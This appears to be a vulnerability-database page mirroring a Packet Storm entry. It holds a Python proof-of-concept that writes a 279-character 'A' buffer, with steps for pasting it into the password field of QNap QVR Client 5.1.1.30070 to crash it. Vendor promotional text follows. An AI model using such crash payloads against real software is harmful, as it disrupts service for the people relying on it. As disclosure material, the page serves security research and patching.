Lucene search
K

QNap QVR Client 5.1.1.30070 Denial Of Service

🗓️ 27 Jul 2018 00:00:00Reported by Luis MartinezType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

QNap QVR Client 5.1.1.30070 Denial Of Service vulnerability exploi

Code
`# Exploit Title: QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)  
# Discovery by: Luis MartAnez  
# Discovery Date: 2018-07-26  
# Vendor Homepage: https://www.qnapsecurity.com/n/en/  
# Software Link : http://download.qnap.com/Surveillance/QVRClient/Qmon_5.1.1.30070.zip  
# Tested Version: 5.1.1.30070  
# Vulnerability Type: Denial of Service (DoS) Local  
# Tested on OS: Windows 10 Pro x64 es  
  
# Steps to Produce the Crash:   
# 1.- Run python code : python QNap_QVR_Client_5.1.1.30070.py  
# 2.- Open QNap_QVR_Client_5.1.1.30070.txt and copy content to clipboard  
# 3.- Open QVR.exe  
# 4.- Direccion IP/Puerto -> 10.10.10.1 / 80  
# 5.- Username -> admin  
# 6.- Paste ClipBoard on Password  
# 7.- OK  
# 8.- Crashed  
  
#!/usr/bin/env python  
  
buffer = "\x41" * 279  
f = open ("QNap_QVR_Client_5.1.1.30070.txt", "w")  
f.write(buffer)  
f.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation